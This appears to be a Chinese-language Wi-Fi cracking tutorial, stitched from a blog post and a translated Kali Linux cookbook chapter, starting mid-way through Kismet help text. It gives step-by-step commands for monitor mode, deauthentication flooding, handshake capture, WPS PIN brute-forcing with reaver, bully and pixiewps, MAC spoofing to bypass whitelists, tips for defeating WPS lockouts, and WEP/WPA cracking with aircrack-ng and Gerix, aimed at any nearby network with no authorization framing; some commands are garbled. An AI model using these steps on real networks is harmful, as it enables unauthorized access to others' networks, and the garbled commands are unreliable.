                               directory instead of the user entry//目录而不是用户条目
     --confdir <path>         Use an alternate path as the base //使用替代路径作为基准
                               config directory instead of the default //目录而不是默认目录
                               set at compile time//在编译时设置
     --datadir <path>         Use an alternate path as the data//使用替代路径作为数据
                               directory instead of the default set at //目录而不是默认设置为
                               compile time.//编译时间。
 *** Logging Options ***
 -T, --log-types <types>      Override activated log types//重写激活的日志类型
 -t, --log-title <title>      Override default log title//重写默认日志标题
 -p, --log-prefix <prefix>    Directory to store log files//存储日志文件的目录
 -n, --no-logging             Disable logging entirely//完全禁用日志记录

 *** Device Tracking Options ***
     --device-timeout=n       Expire devices after N seconds //N 秒后终止设备
使用说明
1、初始化

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

2、过程说明
  1. 无线网卡开启监听模式
    airmon-ng start wlan0 网卡改变为监听状态,改名未wlan0mon
    ps: wlan0 是我的笔记本无线网卡
    查看自己的笔记本无线网卡是哪个的方法:
    iwconfig:查看当前未监听状态以及监听状态的网卡名称。

  2. 修改默认配置文件(/etc/kismet/kismet.conf)

# See the README for more information how to define sources; sources take the
# form of:
# source=interface:options
#
# For example to capture from a Wi-Fi interface in Linux you could specify:
 source=wlan0mon
#
# or to specify a custom name,
# source=ath9k
#
# Sources may be defined in the config file or on the command line via the 
# '-c' option.  Sources may also be defined live via the WebUI.
#
# Kismet does not pre-define any sources, permanent sources can be added here
# or in kismet_site.conf
  1. 启动
    sudo kismet
    浏览器访问
    然后就能看到嗅探到的信息了。

通过 Kismet -s,不在输出终端下输出相关嗅探的ap信息。
默认嗅探到的信息都保存在当前执行命令的环境下目录下,后缀为kismet。

3、捕获的信息查阅
  1. 有些WLAN从安全方面考虑,隐藏了SSID或屏蔽SSID广播,这样做的话的确能够防止使用Netstumbler来扫描,但碰上Kismet就毫无办法了,在上图显示的绿色SSID均为被Kismet探测发现的隐藏SSID。我们点击第一个进入,可以看到下图所示详细信息。Name为发现的SSID名称,SSID:(Cloaked)为该SSID为隐藏。
  2. 当Kismet开始运行时,它将会显示这个区域内它找到的所有的无线局域网,“Name”那一列中所显示出来的内容就是AP的SSID,CH列显示频道,点击任意SSID可以看到BSSID(AP 的MAC地址),加密类型(无),设备厂家(cisco)信息。最下方是接入该AP的终端MAC,类型,使用频率(2.467GHz),网卡型号等信息。甚至当目标计算机已关闭时,Kismet也正可从我们的目标AP中检测到数据包,这是因为目标AP在不停地发出“beacons”。
  3. 在获知AP的上述信息后,再利用Airecrack等工具,就能实施破解,

wifite

相对于 Aircrack-ng 的使用更加容易,相当于吧 Aircrack-ng 的操作过程集成在一步完成。

  1. 启动wifite。
    直接输入 wifite
    启动即扫描
  2. 等待扫描出你需要破解的wifi
    在这里插入图片描述
    CH:是指wifi的信道,这个请自行百度,新一代路由器都会自动分配最佳信道。
    ENCR:是路由器的加密方式,有一种是WEP加密方式很好破解;
    POWER:是无线信号强度;
    WPS:是路由上的WPS开关是否开启,通常是纯数字,也开启的也很好破解;
    CLIENT:是指监听到有多少客户端连接到路由,仅供参考。
    BSSID代表路由器的 MAC 地址
    AUTH 代表认证的方式
    ESSID是WIFI的名字
  3. ctrl+c 停止扫描
    按照提示输入你的目标 wifi num数
    在这里插入图片描述
  4. 然后开始进行扫描客户端,然后开始执行洪水攻击,监听流量抓包,抓到握手的包之后开始进行离线暴力破解。
  5. 暴力破解前自行决定是否更换密码字典。
    wifite 的默认密码字典是 /usr/share/dict/wordlist-probable.txt
    字典内容格式是一行一个密码
    你可以选择网络搜集别人分享的密码字典,或者根据社会工程学利用crunch来生成对应的密码字典。
  6. 破解时间比较长,我用老电脑跑8位全数字密码字典大概5个多小时。后面研究下用GPU跑字典,时间 是不是短点。
 [+] 1 attack completed:
 [+] 1/1 WEP attacks succeeded
        cracked Test (14:E6:E4:AC:FB:20), key: "6162636465"
 [+] disabling monitor mode on mon0… done
 [+] quitting

从以上输出信息中,可以看到解密成功。其中,Test无线接入点的密码是6162636465。

pixiewps

参数说明
> Executing “pixiewps -h”
 Pixiewps 1.4 WPS pixie-dust attack tool
 Copyright (c) 2015-2017, wiire <wi7ire@gmail.com>
 Usage: pixiewps <arguments>
 Required arguments: //必要参数
   -e, --pke         : Enrollee public key  //注册会员公开密码匙
   -r, --pkr         : Registrar public key //注册主任公开密码匙
   -s, --e-hash1     : Enrollee hash-1 // 加入者hash值
   -z, --e-hash2     : Enrollee hash-2
   -a, --authkey     : Authentication session key //认证会话密钥
   -n, --e-nonce     : Enrollee nonce //新登记
 Optional arguments://可选参数:
   -m, --r-nonce     : Registrar nonce//注册主任
   -b, --e-bssid     : Enrollee BSSID
   -v, --verbosity   : Verbosity level 1-3, 1 is quietest           [3] //详细程度1-3级,1级最安静
   -o, --output      : Write output to file //将输出写入文件
   -j, --jobs        : Number of parallel threads to use         [Auto] //使用的线程数

   -h                : Display this usage screen //显示此用法帮助界面
   --help            : Verbose help and more usage examples//详细帮助和更多的使用示例
   -V, --version     : Display version//显示版本

   --mode N[,... N]  : Mode selection, comma separated           [Auto] //模式选择,逗号分隔
   --start [mm/]yyyy : Starting date             (only mode 3) [+1 day] //开始日期
   --end   [mm/]yyyy : Ending date               (only mode 3) [-1 day] //结束日期
   -f, --force       : Bruteforce full range     (only mode 3) //野兽力全射程
 Miscellaneous arguments:  //其他参数:
   -7, --m7-enc      : Recover encrypted settings from M7 (only mode 3)  //从 M7恢复加密设置
   -5, --m5-enc      : Recover secret nonce from M5       (only mode 3)  //从 M5中恢复秘密

 Example (use --help for more):
 pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>
--help example
 Pixiewps 1.4 WPS pixie-dust attack tool
 Copyright (c) 2015-2017, wiire <wi7ire@gmail.com>

 Description of arguments:

 -e, --pke

     Enrollee's DH public key, found in M1.

 -r, --pkr

     Registrar's DH public key, found in M2.

 -s, --e-hash1

     Enrollee hash-1, found in M3. It's the hash of the first half of the PIN.

 -z, --e-hash2

     Enrollee hash-2, found in M3. It's the hash of the second half of the PIN.

 -a, --authkey

     Authentication session key. Although for this parameter a modified version of Reaver or Bully is needed, it can be avoided by specifying small Diffie-Hellman keys in both Reaver and Pixiewps and supplying --e-nonce, --r-nonce and --e-bssid.

 [?] pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -S -n <e-nonce> -m <r-nonce> -b <e-bssid>

 -n, --e-nonce

     Enrollee's nonce, found in M1.

 -m, --r-nonce

     Registrar's nonce, found in M2. Used with other parameters to compute the session keys.

 -b, --e-bssid

     Enrollee's BSSID. Used with other parameters to compute the session keys.

 -S, --dh-small (deprecated)

     Small Diffie-Hellman keys. The same option must be specified in Reaver too. Some Access Points seem to be buggy and don't behave correctly with this option. Avoid using it with Reaver when possible

 --mode N[,... N]

     Select modes, comma separated (experimental modes are not used unless specified):

         1 (RT/MT/CL)
         2 (eCos simple)
         3 (RTL819x)
         4 (eCos simplest) [Experimental]
         5 (eCos Knuth)    [Experimental]

 --start [mm/]yyyy
 --end   [mm/]yyyy

     Starting and ending dates for mode 3. They are interchangeable. If only one is specified, the current time will be used for the other. The earliest possible date is 01/1970, corresponding to 0 (Unix epoch time), the latest is 02/2038, corresponding to 0x7FFFFFFF. If --force is used then pixiewps will start from the current time and go back all the way to 0.

 -7, --m7-enc

     Encrypted settings, found in M7. Recover Enrollee's WPA-PSK and secret nonce 2. This feature only works on some Access Points vulnerable to mode 3.

 [?] pixiewps -e <pke> -r <pkr> -n <e-nonce> -m <r-nonce> -b <e-bssid> -7 <enc7> --mode 3

 -5, --m5-enc

     Encrypted settings, found in M5. Recover Enrollee's secret nonce 1. This option must be used in conjunction with --m7-enc. If --e-hash1 and --e-hash2 are also specified, pixiewps will also recover the WPS PIN.

 [?] pixiewps -e <pke> -r <pkr> -n <e-nonce> -m <r-nonce> -b <e-bssid> -7 <enc7> -5 <enc5> --mode 3
 [?] pixiewps -e <pke> -r <pkr> -n <e-nonce> -m <r-nonce> -b <e-bssid> -7 <enc7> -5 <enc5> -s <e-hash1> -z <e-hash2> --mode 3

简介

顾名思义,就是针对wps连接的wifi进行攻击,但是现在懂wps连接的又有几个呢,然后又费事的用wps连接的又有几个呢,所以就没大用咯。

只适用于固定厂商的芯片,成功率很低
很多厂家实现了锁定机制,所以爆破时应注意限速
一旦触发锁定,可尝试耗尽AP连接数,令其重启并解除WPS锁定

开源地址:https://github.com/wiire-a/pixiewps
国内镜像:https://gitee.com/lhc0101/pixiewps

使用说明

首先确保你的无线网卡能工作,进入monitor模式
airmon-ng start wlan0

使用

	wash -C -i wlan0mon 
	airodump-ng wlan0mon --wps  

来扫描开WPS的AP ctrl+c停止

使用

	 reaver -i wlan0mon -b <AP mac> -vv 
	 reaver -i wlan0mon -b <AP mac> -vv -K 1 

想要攻击的AP’MAC地址 -v -K 1
如果存在该漏洞的话,很快就能出pin和密码了

得到pin码子:如888888

	reaver -i wlan0mon -b <AP mac> -vv -p 88888888

得到密码

如果确实有这方面的漏洞,秒破~

reaver

参数说明
-i  无线网卡名称
-b  目标AP的mac地址
-a  自动检测目标AP最佳配置
-S  使用最小的DH key,可以提高破解速度
-vv  显示更多的非严重警告(注意这是 2 个小写字母 v)
-d  即delay每穷举一次的闲置时间 预设为1秒
-c  信道编号
-p  PIN码四位或八位  //可以用8位直接找到密码。
使用说明

同上一个功能

  1. 同上先开启无线网卡监听
    airmon-ng start wlan0
  2. 然后附近 WLAN 网络
    airodump-ng wlan0mon
  3. 找出开启了 WPS 功能、可以使用 PIN码 登录的路由器,并另外记录下该 AP 的 BSSID(约等于该 AP 的 MAC 地址):
    wash -i wlan0mon
  4. 开始进行 PIN码 穷举破解(注意末尾的参数是 2 个小写字母 v):
    reaver -i wlan0mon -b xx:xx:xx:xx:xx:xx -vv
    reaver -i wlan0mon -b D8:15:0D:D6:13:92 -a -S -d9 -t9 -vv -d9 -t9时间间隔,防止挂掉
  5. 等待破解完成,这期间可以查看到穷举破解花费的时间、预计剩余时间、穷举PIN码进度等信息
  6. 破解完成后,查看并记录下 PIN码 和 密码,获取到 PIN码 后,以后即便路由器更换了密码,也可以很迅速地通过 PIN码 重新获得新密码。举例:
    reaver -i wlan0mon -b xx:xx:xx:xx:xx:xx -p 12316977
  7. 最后,结束无线网卡的监控模式。

bully

是 WPS 穷举法的一个新实现,用 c 语言编写。 它在概念上与其他程序相同,因为它利用了 WPS 规范中的(现在众所周知的)设计缺陷。 与原始的 reaver 代码相比,它有几个优点。 其中包括减少依赖项、改进内存和 cpu 性能、正确处理 endianness 以及更健壮的选项集。 它运行在 Linux 上,并且是专门为在嵌入式 Linux 系统(OpenWrt 等)上运行而开发的,无论其体系结构如何。

开源地址:https://gitlab.com/kalilinux/packages/bully/

说明
参数说明
usage: bully \ interface
Required arguments:
  interface      : Wireless interface in monitor mode (root required)
  -b, --bssid macaddr    : MAC address of the target access point
Or
  -e, --essid string     : Extended SSID for the access point
Optional arguments:
  -c, --channel N[,N...] : Channel number of AP, or list to hop [b/g]
  -i, --index N          : Starting pin index (7 or 8 digits)  [Auto]
  -l, --lockwait N       : Seconds to wait if the AP locks WPS   [43]
  -o, --outfile file     : Output file for messages          [stdout]
  -p, --pin N            : Starting pin number (7 or 8 digits) [Auto]
  -s, --source macaddr   : Source (hardware) MAC address      [Probe]
  -u, --lua              : Lua script file
  -v, --verbosity N      : Verbosity level 1-3, 1 is quietest     [3]
  -w, --workdir path     : Location of pin/session files  [~/.bully/]
  -5, --5ghz             : Hop on 5GHz a/n default channel list  [No]
  -B, --bruteforce       : Bruteforce the WPS pin checksum digit [No]
  -F, --force            : Force continue in spite of warnings   [No]
  -S, --sequential       : Sequential pins (do not randomize)    [No]
  -T, --test             : Test mode (do not inject any packets) [No]
Advanced arguments:
  -d, --pixiewps         : Attempt to use pixiewps               [No]
  -g, --genpin N         : Pin Generator [1] D-Link [2] Belkin    [0]
  -a, --acktime N        : Deprecated/ignored                  [Auto]
  -r, --retries N        : Resend packets N times when not acked  [2]
  -m, --m13time N        : Deprecated/ignored                  [Auto]
  -t, --timeout N        : Deprecated/ignored                  [Auto]
  -1, --pin1delay M[,N]  : Delay M seconds every Nth nack at M5 [0,1]
  -2, --pin2delay M[,N]  : Delay M seconds every Nth nack at M7 [5,1]
  -A, --noacks           : Disable ACK check for sent packets    [No]
  -C, --nocheck          : Skip CRC/FCS validation (performance) [No]
  -D, --detectlock       : Detect WPS lockouts unreported by AP  [No]
  -E, --eapfail          : EAP Failure terminate every exchange  [No]
  -L, --lockignore       : Ignore WPS locks reported by the AP   [No]
  -M, --m57nack          : M5/M7 timeouts treated as WSC_NACK's  [No]
  -N, --nofcs            : Packets don't contain the FCS field [Auto]
  -P, --probe            : Use probe request for nonbeaconing AP [No]
  -Q, --wpsinfo          : Use probe request to gather WPS info  [No]
  -R, --radiotap         : Assume radiotap headers are present [Auto]
  -W, --windows7         : Masquerade as a Windows 7 registrar   [No]
  -Z, --suppress         : Suppress packet throttling algorithm  [No]
  -V, --version          : Print version info and exit
  -h, --help             : Display this help information
参数详细介绍
  -c, --channel N[,N...]

	Channel number, or comma separated list of channels to hop on. Some AP's will switch
	channels periodically. This option allows bully to reacquire an AP and continue an attack
	without intervention. Note that using channel hopping will typically slow an attack,
	especially when the AP's signal is weak, because time is spent scanning channels instead
	of testing pins. If no channel is provided, bully will hop on all channels.

  -i, --index N

	This is the index of the starting pin number in the randomized pin file. This option is
	not valid when running bully in sequential pin search mode.  This is typically handled
	for you automatically, i.e. an interrupted session will resume after the last pin that
	was successfully tested. Note that when less than 7 digits (8 digits if -B is active) are
	given, zeroes are padded on the left.

  -l, --lockwait N

	Number of seconds to wait when an AP locks WPS. Most AP's will lock out for 5 minutes, so
	the default value is 43 seconds. This will cause bully to sleep 7 times during a lockout
	period for a total of 301 seconds.

  -o, --output file

	By default, messages are printed to the standard output. Use this option to send output 
	to the specified file instead.

  -p, --pin N

	This is the starting pin number. Use of this option results in a sequential pin search
	starting at the given pin. This is typically handled for you automatically, i.e. an
	interrupted session will resume after the last pin that was successfully tested. Note
	that when less than 7 digits (8 digits if -B is active) are given, zeroes are padded on
	the left.

  -s, --source macaddr

	The source MAC address to embed in packets sent to the AP. Not all wireless cards can be
	used to spoof the source MAC address like this, but the option is provided for chipsets
	that allow it. When not provided, the wireless interface is probed to retrieve the MAC.

  -v, --verbosity N

	Verbosity level. 1 is the quietest, displaying only unrecoverable error information. Level
	3 displays the most information, and is best used to determine exactly what is happening
	during a session.

  -w, --workdir path

	Working directory, where randomized pins and session files are stored. Session files are
	created in this directory based on the BSSID of the access point. Only one set of randomized
	pins is created, and is used for all sessions. If you want to regenerate the pin file, simply
	delete it from this directory; however incomplete runs that used the deleted file will not
	be restartable. The default directory is ~/.bully/

  -5, --5ghz

	Use 5 GHz (a/n) channels instead of 2.54 GHz (b/g) channels. Untested.

  -B, --bruteforce

	Bruteforce the WPS pin checksum digit rather than calculating it according to the WPS
	specification. Some AP's use a non-compliant checksum in an attempt to evade attacks from
	compliant software. Use of this option can result in a ten-fold increase in the time it
	takes to discover the second portion of the pin, and should only be used when necessary.

  -F, --force

	In certain scenarios bully will print a warning message and exit. This typically indicates that
	it is being used in a manner that is questionable for most users. Advanced users and developers
	can force continuance with this option.

  -S, --sequential

	By default, pins are randomized. This options allows pins to be tested sequentially.

  -T, --test

	Test mode. No packets are injected. Can be used to validate arguments, determine if an
	access point is visible and has WPS enabled, generate a randomized pin file, or create a
	session file for the access point.

  -d, --pixiewps
  
            The -d option performs an offline attack, Pixie Dust (pixiewps),
	by automatically passing the PKE, PKR, E-Hash1, E-Hash2, E-Nonce and Authkey.
	pixiewps will then try to attack Ralink, Broadcom and Realtek chipsets.

  -g, --genpin N
  
            This is a pin generator for either [1] D-Link or [2] Belkin
	routers which uses a known vulnerability names "pingen attack".

  -a, --acktime N

	Deprecated. Packet timings are throttled automatically. Will be removed in future revision.

  -r, --retries N

	How many times do we resend packets when they aren't acknowledged? Default is 3. The idea is to
	make a best effort to ensure the AP receives every packet we send, rather than have transactions
	fail and restart due to a missed packet.

  -m, --m13time N

	Deprecated. Packet timings are throttled automatically. Will be removed in future revision.

  -t, --timeout N

	Deprecated. Packet timings are throttled automatically. Will be removed in future revision.

  -1, --pin1delay M[,N]

	Delay M seconds for every Nth NACK at M5. The default is 0,1 (no delay). Some access points
	get overwhelmed by too many successive WPS transactions, and can even crash if we don't dial
	things back a bit. This is the delay period to use during the first half of the pin.

  -2, --pin2delay M[,N]

	Delay M seconds for every Nth NACK at M7. The default is 0,1 (no delay). Some access points
	handle transactions through M4 easily, only to fall down on too many successive M6 messages.
	This is the delay period to use during the second half of the pin.
	
  -A, --noacks

	Turn off acknowledgement processing for all sent packets. Useful if you are sure the AP is
	receiving packets even though bully can't see acknowledgements. You might need this for a USB
	wifi adapter that processes acknowledgements and drops them before libpcap ever sees them.

  -C, --nocheck

	Turn off frame check sequence processing. We can improve performance somewhat by making the
	dubious assumption that all packets we receive are valid. See also --nofcs below.

  -D, --detectlock

	Certain access points do not indicate that they have locked WPS in their beacon IE tags, but
	summarily ignore all WPS transactions for a period of time. With this option, we can detect the
	condition and sleep for --lockdelay seconds before resuming. In the interests of remaining
	undetected, there is no point in broadcasting 5 minutes worth of unanswered EAP START messages.

  -E, --eapfail

	Send EAP FAIL messages after each transaction. Some AP's get confused when they don't see this.

  -L, --lockignore

	Ignore WPS lock conditions reported in beacon information elements (don't sleep).

  -M, --m57nack

	Treat M5 and M7 timeouts as NACK's, for those access points that don't send them but instead
	drop the transaction. When using this option you will probably want to increase the --timeout 
	value, so that bully doesn't incorrectly assume a pin is incorrect due to a delayed message.

  -N, --nofcs

	Some wireless hardware will have done the work of checking and stripping the FCS from packets
	already. Bully usually detects this and adjusts accordingly, but the option is here if you need
	to force it.

  -P, --probe

	Bully uses beacons to examine the WPS state of an access point. For nonbeaconing AP's, send
	directed probe requests and use the resulting probe responses instead. Requires --essid.

  -Q, --wpsinfo

	Gather WPS info by using probe request(s) against a target.
	May reveal chipset manufacturer, WPS version and other geeky stats.

  -R, --radiotap

	Assume radiotap headers are present in received packets. This is useful in cases where presence
	of radiotap headers is incorrectly reported or detected.

  -Z, --suppress

	Suppress automatic timimg algorithm and instead use default timings for received packets. NOT
	RECOMMENDED.

  -W, --windows7

	Masquerade as a Windows 7 registrar.

  -V, --version

	Print version information to standard output and exit.

  -h, --help

	Display onscreen help.

原理分析

MAC地址绑定攻击

管理员误以为MAC绑定是一种安全机制,能够限制可以关联的客户端MAC地址。
准备AP:
1、AP基本配置
2、Open认证
3、开启无线过滤
修改MAC地址绕过过滤:
别人做了白名单mac绑定,这样的话,侦听这个BSSID,查看哪一个STA的MAC已经连上,复制这个已经连上的STA的MAC,把这个MAC地址复制到自己的无线网卡的MAC上。

ifconfig wlan0 down
macchanger -m 接MAC地址 接网卡
ifconfig wlan0 up

再去连接,就可以连接上了。——>双方存在的话会丢包,信号不好(除非只有一个存在)

WEP密码破解原理
WEP共享密钥破解

1、IV并非完全随机
2、每224个包可能出现一次IV重用
3、收集大量IV之后找出相同IV及其对应密文,分析得出共享密码
ARP回包中包含IV
只要在IV足够多的情况下,任何复杂程度的WEP密码都可以被破解(IV量破解和暴力破解)

FAKE AUTHENTICATION

伪造认证,以便与AP进行正常通信

ARP重放

侦听正常的ARP包并重放给AP
AP回包中包含大量弱IV——>重复出现

WPA攻击
DEAUTHENTICATION

强制客户端与AP断开关联
重连生成ARP请求,AP回包包含IV
WPA重连过程,过程抓取4步握手过程,保存到本地cap文件中。
无客户端情况下此攻击无效
暴力破解条件:

1、CPU资源
2、时间
3、字典质量:
	网上共享的字典
	泄露密码(an Internet)
	地区电话号码段
	Crunch生成字典
	kali中自带的字典 ——>有些密码不符合要求,会自动过滤
WPS攻击
  • WPS是WiFi联盟2006年开发的一项技术
    通过PIN码来简化无线接入的操作,无需记住PSK
    路由器和网卡各按一个按钮就能接入无线
    PIN码是分为前后各4位的2段共8位数字
  • 安全漏洞
    2011年被发现安全涉及漏洞
    接入发起方可以根据路由器的返回信息判断前4位是否正确
    而PIN码的后4位只有1000种定义的组合(最后一位是checksum)
    所以全部穷举破解只需要11000次尝试
    PSK:218340105584896种可能
    标准本身没有设计锁定机制,目前多个厂商已实现锁定机制
    //都要支持WPS功能,初衷是:物理连接,物理确认(通过按钮 )。
    //AP要是支持WPS的话,只要尝试最多11000次找出PIN码,就会被破解。
    ——>因为有限制,所以设置攻击方式、次数等
  • 用计算器直接算出PIN
    C83A35、00B00C——>很少见
    //它直接找出PIN码,最多11000次;找出后计算出key,肯定能算出,不像WPA要字典。
小实验

隐藏SSID防止破解有用么?
隐藏SSID就是把你wifi的AP隐藏起来,不让别人搜索到。请注意,这样的话,在连接wifi时就要手动输入AP名。
在这里插入图片描述
只看到了 length 12,没有ap名。

airodump-ng -c 6 --bssid C8:3A:35:30:3E:C8 wlan0mon
aireplay-ng -0 30 -a C8:3A:35:30:3E:C8 -c B8:E8:56:09:CC:9C wlan0mon

破解密码的方法不变;使用上面两个命令就可以轻松得到ap名。

事实证明,隐藏SSID并不管啥事;其实设置一个复杂的密码比隐藏SSID要管用的多。

本文同步更新至个人博客:罗小黑零食铺
如果个人博客打不开就是维护升级中~

2016-10-04 16:42:23 wizardforcel 阅读数 16951

第九章 无线攻击

作者:Willie L. Pritchett, David De Smet

译者:飞龙

协议:CC BY-NC-SA 4.0

简介

当今,无线网络随处可见。由于用户四处奔走,插入以太网网线来获取互联网访问的方式非常不方便。无线网络为了使用便利要付出一些代价;它并不像以太网连接那样安全。这一章中,我们会探索多种方式来操纵无线网络流量,这包括移动电话和无线网络。

9.1 WEP 无线网络破解

WEP(无线等效协议)于 1999 年诞生,并且是用于无线网络的最古老的安全标准。在 2003 年,WEP 被 WPA 以及之后被 WPA2 取代。由于可以使用更加安全的协议,WEP 加密很少使用了。实际上,推荐你永远不要使用 WEP 加密来保护你的网络。有许多已知的方式来攻击 WEP 加密,并且我们在这个秘籍中会探索这些方式之一。

这个秘籍中,我们会使用 AirCrack 套件来破解 WEP 密码。 AirCrack 套件(或 AirCrack NG)是 WEP 和 WPA 密码破解程序,它会抓取无线网络封包,分析它们,使用这些数据来破解 WEP 密码。

准备

为了执行这个秘籍中的任务,需要Kali 终端窗口的经验。也需要受支持的配置好的无线网卡,用于封包注入。在无线网卡的例子中,封包注入涉及到发送封包,或将它注入到双方已经建立的连接中。请确保你的无线网卡允许封包注入,因为并不是所有无线网卡都支持它。

操作步骤

让我们开始使用 AirCrack 来破解WEP 加密的网络会话。

  1. 打开终端窗口,并产生无线网络接口的列表:

    airmon-ng

  2. interface列下,选择你的接口之一。这里,我们使用wlan0。如果你的接口不同,例如mon0,请将每个提到wlan0的地方都换成它。

  3. 下面,我们需要停止wlan0接口,并把它关闭,便于我们接下来修改 MAC 地址。

    airmon-ng stop 
    ifconfig wlan0 down
  4. 下面,我们需要修改我们接口的 MAC 地址。由于机器的 MAC 地址会在任何网络上标识你的存在,修改机器的标识允许我们隐藏真正的 MAC 地址。这里,我们使用00:11:22:33:44:55

    macchanger --mac 00:11:22:33:44:55 wlan0 
  5. 现在我们需要重启airmon-ng

    airmon-ng start wlan0
  6. 下面,我们会使用airodump来定位附近的可用无线网络。

    airodump-ng wlan0 
  7. 这会出现可用无线网络的列表。一旦你找到了你想要攻击的网络,按下Ctrl + C来停止搜索。选中BSSID列中的 MAC 地址,右击你的鼠标,并且选择复制。同时,把网络正在发送哪个频道的信号记录下载。你会在Channel列中找到这个信息。这里,这个频道是10

  8. 现在运行airodump,并且将所选BSSID的信息复制到文件中。我们会使用下列选项:

    • -c允许我们选择频道。这里我们选择10

    • -w允许我们选择文件名称。这里我们选择wirelessattack

    • -bssid允许我们选择我们的BSSID。这里,我们从剪贴板上粘贴09:AC:90:AB:78

    airodump-ngc 10 –w wirelessattack --bssid 09:AC:90:AB:78 wlan0 
  9. 新的窗口会打开,并展示这个命令的输出。保持这个窗口开着。

  10. 打开另一个终端窗口,为了尝试组合它们,我们运行aireplay。它拥有下列语法:aireplay-ng -1 0 –a [BSSID] –h [our chosen MAC address] –e [ESSID] [Interface]

    aireplay-ng -1 0 -a 09:AC:90:AB:78h 00:11:22:33:44:55e backtrack wlan0
  11. 下面,我们发送一些流量给路由器,便于捕获一些数据。我们再次使用aireplay,以下列格式:aireplay-ng -3 –b [BSSID] – h [Our chosen MAC address] [Interface]

    aireplay-ng -3b 09:AC:90:AB:78h 00:11:22:33:44:55 wlan0
  12. 你的屏幕会开始被流量填满。将它运行一到两分钟,直到你拥有了用来执行破解的信息。

  13. 最后我们运行 AirCrack 来破解 WEP 密码。

    aircrack-ngb 09:AC:90:AB:78 wirelessattack.cap 

    这就结束了。

工作原理

在这个秘籍中,我们使用了 AirCrack 套件来破解无线网络的 WEP 密码。AirCrack 是最流行的 WEP 破解工具之一。AirCrack 通过收集 WEP 无线连接的封包来工作,之后它会通过算术分析数据来破解 WEP 加密密码。我们通过启动 AirCrack 并选择我们想要的接口来开始。下面,我们修改了 MAC 地址,这允许我们修改互联网上的身份,之后使用airodump搜索可用的无线网络来攻击。一旦我们找到了打算攻击的网络,我们使用aireplay来将我们的机器与正在攻击的无线设备的 MAC 地址关联。我们最后收集到了一些流量,之后暴力破解生成的 CAP 文件来获得无线密码。

5.2 WPA/WPA2 无线网络破解

WPA(无线保护访问)于 2003 年诞生,并且为保护无线网络和取代过时的旧标准 WEP 而创建。WEP 被 WPA 以及之后的 WPA2 代替。由于存在更加安全的协议,WEP 很少使用了。

这个秘籍中,我们会使用 AirCrack 套件来破解 WPA 密码。 AirCrack 套件(或 AirCrack NG)是 WEP 和 WPA 密码破解程序,它抓取网络封包,分析它们,并使用这些数据破解 WPA 密码。

准备

为了执行这个秘籍中的任务,需要Kali 终端窗口的经验。也需要受支持的配置好的无线网卡,用于封包注入。在无线网卡的例子中,封包注入涉及到发送封包,或将它注入到双方已经建立的连接中。

操作步骤

让我们开始使用 AirCrack 来破解WEP 加密的网络会话。

  1. 打开终端窗口,并产生无线网络接口的列表:

    airmon-ng

  2. interface列下,选择你的接口之一。这里,我们使用wlan0。如果你的接口不同,例如mon0,请将每个提到wlan0的地方都换成它。

  3. 下面,我们需要停止wlan0接口,并把它关闭,便于我们接下来修改 MAC 地址。

    airmon-ng stop 
    ifconfig wlan0 down
  4. 下面,我们需要修改我们接口的 MAC 地址。由于机器的 MAC 地址会在任何网络上标识你的存在,修改机器的标识允许我们隐藏真正的 MAC 地址。这里,我们使用00:11:22:33:44:55

    macchanger --mac 00:11:22:33:44:55 wlan0 
  5. 现在我们需要重启airmon-ng

    airmon-ng start wlan0
  6. 下面,我们会使用airodump来定位附近的可用无线网络。

    airodump-ng wlan0 
  7. 这会出现可用无线网络的列表。一旦你找到了你想要攻击的网络,按下Ctrl + C来停止搜索。选中BSSID列中的 MAC 地址,右击你的鼠标,并且选择复制。同时,把网络正在发送哪个频道的信号记录下载。你会在Channel列中找到这个信息。这里,这个频道是10

  8. 现在运行airodump,并且将所选BSSID的信息复制到文件中。我们会使用下列选项:

    • -c允许我们选择频道。这里我们选择10

    • -w允许我们选择文件名称。这里我们选择wirelessattack

    • -bssid允许我们选择我们的BSSID。这里,我们从剪贴板上粘贴09:AC:90:AB:78

    airodump-ngc 10 –w wirelessattack --bssid 09:AC:90:AB:78 wlan0 
  9. 新的窗口会打开,并展示这个命令的输出。保持这个窗口开着。

  10. 打开另一个终端窗口,为了尝试组合它们,我们运行aireplay。它拥有下列语法:aireplay-ng -1 0 –a [BSSID] –h [our chosen MAC address] –e [ESSID] [Interface]

    Aireplay-ng --deauth 1 –a 09:AC:90:AB:78c 00:11:22:33:44:55 wlan0 
  11. 最后我们运行 AirCrack 来破解 WEP 密码。-w选项允许我们指定单词列表的位置。我们使用事先命名的.cap文件。这里,文件名称是wirelessattack.cap

    Aircrack-ng –w ./wordlist.lst wirelessattack.cap

    这就结束了。

工作原理

在这个秘籍中,我们使用了 AirCrack 套件来破解无线网络的 WPA 密码。AirCrack 是最流行的 WPA 破解工具之一。AirCrack 通过收集 WPA 无线连接的封包来工作,之后它会通过算术分析数据来破解 WPA 加密密码。我们通过启动 AirCrack 并选择我们想要的接口来开始。下面,我们修改了 MAC 地址,这允许我们修改互联网上的身份,之后使用airodump搜索可用的无线网络来攻击。一旦我们找到了打算攻击的网络,我们使用aireplay来将我们的机器与正在攻击的无线设备的 MAC 地址关联。我们最后收集到了一些流量,之后暴力破解生成的 CAP 文件来获得无线密码。

9.3 无线网络自动化破解

这个秘籍中我们会使用 Gerix 将无线网络攻击自动化。Gerix 是AirCrack的自动化 GUI。Gerix 默认安装在 Kali Linux 中,并且能够加速我们的无线网络破解过程。

准备

为了执行这个秘籍中的任务,需要Kali 终端窗口的经验。也需要受支持的配置好的无线网卡,用于封包注入。在无线网卡的例子中,封包注入涉及到发送封包,或将它注入到双方已经建立的连接中。

操作步骤

让我们开始使用 Gerix 进行自动化的无线网络破解。首先下载它:

  1. 使用wget,访问下面的网站并下载 Gerix:

    wget https://bitbucket.org/Skin36/gerix-wifi-cracker-pyqt4/ downloads/gerix-wifi-cracker-master.rar
  2. 文件下载好之后,我们需要从 RAR 文件中解压数据。

    unrar x gerix-wifi-cracker-master.ra
  3. 现在,为了保持文件一致,让我们将 Gerix 文件夹移动到/usr/share目录下,和其它渗透测试工具放到一起。

    mv gerix-wifi-cracker-master /usr/share/gerix-wifi-cracker
  4. 让我们访问 Gerix 所在的目录:

    cd /usr/share/gerix-wifi-cracker
  5. 我们键入下列命令来启动 Gerix:

    python gerix.py

  6. 点击Configuration(配置)标签页。

  7. Configuration标签页中,选择你的无线接口。

